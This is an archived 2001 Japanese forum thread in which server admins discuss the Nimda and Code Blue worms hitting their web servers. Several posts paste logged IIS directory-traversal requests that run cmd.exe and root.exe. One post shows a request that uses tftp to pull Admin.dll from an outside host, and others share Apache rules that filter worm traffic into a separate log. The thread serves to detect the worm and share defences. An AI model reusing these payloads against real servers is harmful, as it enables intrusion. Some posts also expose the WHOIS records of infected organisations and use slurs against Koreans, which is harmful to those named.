1read 100read
2012年5月セキュリティ134: ◆Code Blue◆ 2000厨は逝ってよし (171) TOP カテ一覧 スレ一覧 2ch元 削除依頼
住基ネット祭 その2 (844)
◇Avira Internet Security 2012 Part.3◇ (359)
ウイルスチェイサーPart8 (322)
【Pro版限定】Agnitum Outpost Firewall PRO 9 (340)
トレンドマイクロ スパイバスター part1 (439)
トレンドマイクロ スパイバスター part1 (439)

◆Code Blue◆ 2000厨は逝ってよし


1 :01/09/19 〜 最終レス :12/05/13
参照
http://www.zdnet.co.jp/help/howto/security/v08/02.html
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
関連スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

2 :
リターンヘッダを見るようにコードを修正しろ。

3 :
Code赤がいくらか落ちついたと思ったら 今度は青だってか。
トラフィックが無茶増えて苦しいぞ、うちの回線。

4 :
なんか勢い増してきたみたい・・。鬱だ

5 :
ISSには
>Code Blueは対象にHTTP HEAD照会を送信し、対象からのレスポンスを検査します。
>IISがインストールされていることが分かると、Code BlueはHTTP GET要求を送信し、
って書いてあるけど、今来てるやつらはいきなりGET投げて来るから亜種だと思う。

6 :
MSNがやられましたw
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml

7 :
ところで…てゆうか、はあ…もうカンベンしてほしいね。新鮮味もなにもないよ…

8 :
秋の新作ってトコかな (藁

9 :
では、前回の反省を活かしてIPは晒しアリの方向で。

10 :
/_mem_bin/..%5c../..%5c..
/_vti_bin/..%5c../..%5c..
あー、来てる来てる。こいつかあ。

11 :
www4.jvnet.or.jp
↑こっからも飛んでくる。。。。。
こんなプロバイダには加入したくないものだ。。。。

12 :
参考:
http://memo.st.ryukoku.ac.jp/archive/200109.month/1197.html

13 :
また祭り?

14 :
私の所には いまのところ
203.***.***.*** しかこないですよ みなさんは?

15 :
不正アクセス禁止法でしたい!!!

16 :
202.xxx.xxx.xxx なIPに鯖があるんだが、JPドメインからどんどん来るね

17 :
>>14
自分のIPがそうなんじゃないの?

18 :
>>13
♪♪秋祭り♪♪
今回の奴は鯖のHTMLも書き換え、IE使ってる人にファイルをDLさせる
みたい。IEな人は MS01-020 のパッチ当てとくほうがいいね。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50

19 :
>>そうみたいです
 なんで?

20 :
秋の新作の名は Nimda というらしい?
MSN関連スレの方が盛り上がってるね
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml

21 :
テロ〜嫌い。
まぁ祭りになりそうですね〜

22 :
うちにもさっきから怒濤のように来だしたよ。(極鬱
何事かと思って色々調べてたんだけど、2chはやっぱみんな早いねぇ(感心)
恥ずかしながら最初に来たのがニイハオのIPだったんで、慌ててIP蹴ってた。
で、これがBlue?
うちもいきなりGETから入っているんですが・・・

23 :
どうも、Code Blueでは無さそう。
↑にリンクしたけど、17日に報告されてる新作のNimdaと思われ

24 :
Code BlueとCode Redとログはどう違うの?
最近、Zone Alarmがよけいに警告増えてきた(T_T)

25 :
リンク追加:
http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

26 :
CodeRedのアクセスログがかわいく見える…。

27 :
<丶`∀´>ニムダ!

28 :
>>24
ログの見え方的には
初代Code Redは NNNNNNNN ってNがいっぱい
Code Red2は XXXXXXXXXX ってXいっぱい
Code Blueは ・・・・よくわからん。
>>1の ISSKKのURL見てね

29 :
テロ〜嫌い。
まぁ祭りになりそうですね〜

30 :
>>8 サンクス

31 :
ISSの情報ではCode Blueが来たならばまずHEADメソッドの
ログがあるはずだからその辺で見分けられるでしょう。
#わたしゃApache使いなのでわからんのです

32 :
コレの影響か、Code Red2が激減した。
CERTにも情報出たみたいだ。
http://www.cert.org/current/current_activity.html#port80

33 :
しかし飛んでくる量が赤虫&赤虫Uの比じゃないな。
同じIPから概出の穴を舐めるように1セットで飛んでくる。
そんなとこまで舐めちゃイやん(バカ)
"GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215

34 :
今度はどこの国が作ったのかね。おれはアメリカに100ペソ

35 :
2週間食料供給が途絶えれば人が餓死する
可能性が増えるようなアフガンの人がWormを作れる
わけないだろし。そもそも電気だってまともになさげ。
いくらタイムリーだからってラディンと結びつけるのは
単純だと思われ。

36 :
16:36:16 168.11.112.104 - GET /scripts/root.exe /c+dir 404 494 72 HTTP/1.0 - - -
なんてのが来た、ゲ、内側かとか思ってしまった。

37 :
アタックがDNSサーバーらしきところからが多いんだけど、
DNSサーバーの穴掘られてるのかしらん。

38 :
アメリカ・・・

39 :
>>35
さては君誤爆だね?

40 :
昨晩10時から
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
の嵐。ほとんど韓国のIPだが、時に日本企業のもある。
何とかしてクレー。ページが重いよ。

41 :
>>34
ニムダ・・・ニムダ・・・ニ・ダ・・・ニダ・・・チョンじゃねーか(w

42 :
ああぁ、帯域半分食われてるよ。128Kしかないのに。
ここは、IIS無いんだから勘弁してよぉ〜。
IPが202.230.xx.xxだからなのか、キムチの国から
いっぱいいっぱいやってくる。
もうやめてぇ〜。鬱だし脳。

43 :
まあキムチでも食ってマターリ逝こうよ

44 :
16回アタックで1セット?

45 :
キムチ買いに逝ってきます。

46 :
マータリ考えて
Apacheのな人向けのログ切り出しサンプル考えてみたです。
warmのゴミログとマトモなアクセスログと切り離せます
SetEnvIf Request_URI "default\.ida" warmlog
SetEnvIf Request_URI "cmd\.exe" warmlog
SetEnvIf Request_URI "root\.exe" warmlog
CustomLog /var/log/apache/warmlog combined env=warmlog
CustomLog /var/log/apache/accesslog combined env=!warmlog
さーて寝よ

47 :
pc201.hellobox.co.jpからの攻撃が立て続けに来ている。
はっきりいってウザイ・・・

48 :
>>44
ログ見てみると、どうやらそのようだね。

49 :
wormね

50 :
>>49
わーむだす。

51 :
>>50
???
>>46のスペルが違うな〜って思っただけ

52 :
はずかしー。
s/warm/worm/

53 :
>>51
ノッタだけなので・・スマソ
スペル?知りません(爆

54 :
ログがお祭り状態。
確かに韓国からも多いけど、com、net、eduからの訪問も。

55 :
いやいや、当方半分以上は日本の企業ですぜ。
なかにはinterqもはいってるんだけど、、、
おまえISPのくせになにやってんだゴルァ

56 :
INTERLINKもISPのくせに自分とこのwwwに感染。顧客を攻撃中ダヨ。

57 :
さすがにもう噂になっているのね。
おれはAN-HTTPDだけど、1時間ほど放っておいて飯を食べていたら、タスクバーが
ビカビカ光っているのを見てびびってしまった。
しかし、よく来るね。
基本的にCGIの動作確認用に使っているだけなので、そろそろポート80を閉じて
しまおう。ログ見るのあきた。

58 :
理研ビニル工業株式会社だと

59 :
dns1.****.co.jpやら
ns.****.co.jpとかからバンバン来る・・・

60 :
多いなあ。2時台だけで21件。

61 :
同じホストからなんども来るねえ・・・

62 :
うちには2−3分ごとに8発づつくる!

63 :
ウチはLINUXサーバですが
ドキュメントルートにc/winnt/system32/とフォルダをつくり
cmd.exeという名前でブラクラを置きました・・・
接続してくるサーバはリソース消費して落ちないのでしょうか
落ちてくれないと気が付かないのでしょうね・・・

64 :
落ちるのはそのブラクラに対応したブラウザで接続してきたお方でございます。
カウンタでも作りましょう。わーむちゃんのログを隔離して解析するもよし。

65 :
18/Sep/2001/22:34.21 からXXXXXXXがほとんどなくなって...
/scripts/root.exe? の類の嵐。種類はいっぱい
ダミーのroot.exeを置いてるけど。誰か探ってんのかなと思ったら
来る奴みんな探っていってるから、これがblueかな?
本格的に始まったみたい

66 :
HostnameLookups Double
にしてて ほとんどIPアドレスのままなんだけど
httpd-access.logとかに
HostNameにうまく変える方法ないですか?

67 :
>>56
詳細きぼん♪

68 :
>>66
logresolve とかどうですか?
logresolve is a post-processing program to resolve IP-
adresses in Apache's access logfiles. To minimize impact
on your nameserver, logresolve has its very own internal
hash-table cache. This means that each IP number will only
be looked up the first time it is found in the log file.

69 :
>>65
赤虫のときに、ダミー置くとIISと判断されて集中砲火を食らう、という事例があったけど、
青虫ではどうなんだろうか?

70 :
>68
負荷の問題ではなくそもそも逆引きがDNS登録されていないだけだから
それでは役に立たないと思われ。。

71 :
KDDIS ゴラァ
何が「KDDIの日本橋AP内に設置するため、空調・電源は万全です。」だ!!!
てめぇんとこの鯖がワームに感染してんじゃねーよ
確かにセキュリティー・ウィルス対策していますとは書いてねーけど。
管理者クビポンにしろ
http://www.kddis.ne.jp/new2/top.html

72 :
Nimdaの続報 日本語版登場です
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html

73 :
こんな所からも来ました。
Domain Information: [ドメイン情報]
a. [ドメイン名] IISR.GR.JP
e. [そしきめい] いんたーねっとじょうほうせんりゃくけんきゅうしょ
f. [組織名] インターネット情報戦略研究所
g. [Organization] Internet Information Strategy Research Institute
k. [組織種別] 任意団体
l. [Organization Type] Group
m. [登録担当者] SA1256JP
n. [技術連絡担当者] SA1256JP
p. [ネームサーバ] ns1.iisr.gr.jp
p. [ネームサーバ] ns1.nava21.ne.jp
p. [ネームサーバ] ns3.nava21.ne.jp
y. [通知アドレス] asano@iisr.gr.jp
[状態] Connected (2002/03/31)
[登録年月日] 2000/10/03
[接続年月日] 2000/10/30
[最終更新] 2001/03/19 16:05:44 (JST)
n-nakako@nava21.co.jp

74 :
ここの名前(・∀・)イイ
ニムダアタック晒し
Domain Information: [ドメイン情報]
a. [ドメイン名] KIDDYLAND.CO.JP
e. [そしきめい] かぶしきがいしゃきでいらんど
f. [組織名] 株式会社 キデイランド
g. [Organization] KIDDY LAND CO.,LTD
k. [組織種別] 株式会社
l. [Organization Type] Corporation
m. [登録担当者] SA235JP
n. [技術連絡担当者] KS1250JP
p. [ネームサーバ] ns.kiddyland.co.jp
p. [ネームサーバ] s-field1.sunfield.ne.jp
y. [通知アドレス] nsp-addr@sunfield.ne.jp
[状態] Connected (2002/03/31)
[登録年月日] 1997/12/02
[接続年月日] 1998/02/02
[最終更新] 2000/02/14 09:51:41 (JST)
nsp-addr@sunfield.ne.jp

75 :
これで1セットみたいよ
- -> /c/winnt/system32/cmd.exe
- -> /d/winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
- -> /msadc/..%5c../..%5c../..%5c/..\xc1^\../..\xc1^\../..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc1^\../winnt/system32/cmd.exe
- -> /scripts/..\xc0/../winnt/system32/cmd.exe
- -> /scripts/..\xc0\xaf../winnt/system32/cmd.exe
- -> /scripts/..\xc1\x9c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%5c../winnt/system32/cmd.exe
- -> /scripts/..%2f../winnt/system32/cmd.exe

76 :
こんなニュースめっけた。
http://www.zdnet.co.jp/news/0109/12/e_codeblue.html

77 :
http://www.zdnet.co.jp/broadband/0109/07/codegreen.html
bule green どれがどれ?

78 :
これメチャメチャおもろい!
http://www.security.nl/misc/codered-stats/geodist.gif

79 :
俺もあまりに頭にきたのでさらします
203.141.185.132 - - [18/Sep/2001:22:27:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
Domain Information: [ドメイン情報]
a. [ドメイン名] OFFICETOKYO.CO.JP
e. [そしきめい]
f. [組織名] 東京事務所有限会社
g. [Organization] TOKYO JIMUSHO Co.,Ltd.
k. [組織種別] 有限会社
l. [Organization Type] Company
m. [登録担当者] TF198JP
n. [技術連絡担当者] TF198JP
p. [ネームサーバ] dns1.officetokyo.co.jp
p. [ネームサーバ] mars.kcom.ne.jp
y. [通知アドレス]
[状態] Connected (2002/03/31)
[登録年月日] 1997/03/28
[接続年月日] 1997/04/15
[最終更新] 1998/06/09 19:04:59 (JST)
Sunabe@kddcom.co.jp

80 :
http://kanko.maizuru-bay.or.jp/
もやばいです。
おそらくNimdaでしょう。
皆さんアクセスしないようにしましょう。

81 :
へ〜CodeBlueかぁ・・・と思ってウチのApacheのログ見たら
GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
ぎっしりこれで埋まってた。ようやくCodeRedが収まってきたと思ったら・・・。
ていうかこれCodeRed全盛の時よりももっとたくさんきてる気がするよ。

82 :
>>63
/c/winnt/system32/cmd.exe があると4発増える
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
GET /c/Admin.dll HTTP/1.0

83 :
>>82
ん?どういう意味?

84 :
ここもあった。
210.91.255.164

85 :
211.185.177.1
66.125.116.35
211.196.186.105
202.62.120.21
211.186.149.122

86 :
>>83
バックドアが見つかったと思ってAdmin.dllっつーのを
送り込もうとして来るみたい。

87 :
なんだか一度にまとめて同一IPからぶっ放してくると思うと
その後はしばらく止んだり・・・と攻撃が散漫ですね
せめて韓国からのアクセスだけでも蹴れないもんでしょうかね、ふぅ。

88 :
誰かが書いてたけど、Nimdaアクセスしてくるやつがcmd.exeを
ゲットしようとするならその名前のやばいファイル置いといて
反撃できないのかなぁ。

89 :
>>88
CRcreanみたいなやつ?

90 :
>>89
それどんなの?
Google検索でヒットせず・・・。

91 :
つーか、これってCodeBlue??Nimda??
混乱してきた。

92 :
>>90
「ネットを舞台にした赤と緑の対決」 by ZDNet
 ttp://www.zdnet.co.jp/broadband/0109/07/codegreen.html

93 :
>>88
>誰かが書いてたけど、Nimdaアクセスしてくるやつがcmd.exeを
Serverサイドで実行されると思われ。自滅してどうする。

94 :
>>93
サーバーがIISじゃなきゃ問題ない、とか?

95 :
>>92
べりさーんくす!いまから見てきます!
>>93
仕掛けるものにもよると思うけど、とりあえずうちはLinuxだから
平気です。

96 :
>>91
Nimda。
CodeBlueもCodeRedも関係ない。
同じ脆弱性もついてるけど、より悪質。
http://www.ipa.go.jp/security/topics/newvirus/nimda.html

97 :
話題からそれるけど、こんな記事があった。
http://headlines.yahoo.co.jp/hl?a=20010919-00052271-reu-int

98 :
今度はCodeBlueが怒濤のごとくやってきます。困りました。

99 :
>>46
/.jpにtypoった奴+αのが載っててたよ・・。
今更だけどAdmin.dllも含む改訂版を書いておきます。
#Admin.dllは普通だと来ないと思うけど
SetEnvIf Request_URI "default\.ida" wormlog
SetEnvIf Request_URI "cmd\.exe" wormlog
SetEnvIf Request_URI "root\.exe" wormlog
SetEnvIf Request_URI "Admin\.dll" wormlog
CustomLog /var/log/apache/warmlog combined env=wormlog
CustomLog /var/log/apache/accesslog combined env=!wormlog


100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
☆完全に発信元隠す方法ってあるんだろ☆ (195)
結局ノートンが一番いいんだな (704)
Linuxをつかいませんか (230)
【2012】 AVG Anti-Virus Ver 109 (911)
【2012】 AVG Anti-Virus Ver 109 (911)
【Pro版限定】Agnitum Outpost Firewall PRO 9 (340)
--log9.info------------------
高学歴はバンプを聴く (890)
ベリテンライブ2008Special (448)
聴くと死にたくなる曲 (596)
レミオロメンの藤巻ボーカルが死ぬほどムカつく (928)
【レミオロメン】神宮司治 アンチスレ【ドラム】 (188)
最近のアニソンのクオリティの高さは異常 (590)
★★★  倖田來未との見分け方  ★★★ (672)
【圧倒的】世界最強の三大歌姫【歌唱力】 (873)
【(´・3・)】5人で口笛を極めませんか?【(・ε・`)】 (230)
ネギま!に負けたオレンジレンジの反応・・・ (369)
ゆとりの聴く音楽のセンスの無さ その二 (337)
ジャニーズアイドルの歌唱力は糞 part3 (709)
声が劣化し過ぎていて幻滅した歌手 (136)
このアーティストはこの曲からおかしくなり始めた (526)
稲葉浩志はスティーブン/フレディを超えたのか? (809)
【涙】感動するPV教えて!!!【涙】 (705)
--log55.com------------------
プロ野球ニュース水曜キャスターの衛藤美彩のスレ
【虚偽発表】1月に流出して運営が削除したと発表した元アイドリング・マジパン佐藤麗奈の裏アカが消されずに使用され続けていた件 11.4
佐藤優樹です!牧野まりあです! 2人合わせてまりまーです! 110まりまー
ハo´ 。`ルくどぅーこと工藤遥ちゃん応援スレ Part363
エーダー金澤朋子ちゃんがスッキリで女王様認定されました!!
仮面ライダー&特撮スレ
■ 宮崎由加 ■ 宮崎由加のPinky Friday【第6〜7回】 ■ 18:00〜18:30 エフエム石川(金沢 80.5MHz) ■
【アンジュルム】むろたんこと室田瑞希ちゃんを応援してみよう【ハッピー】 Part.188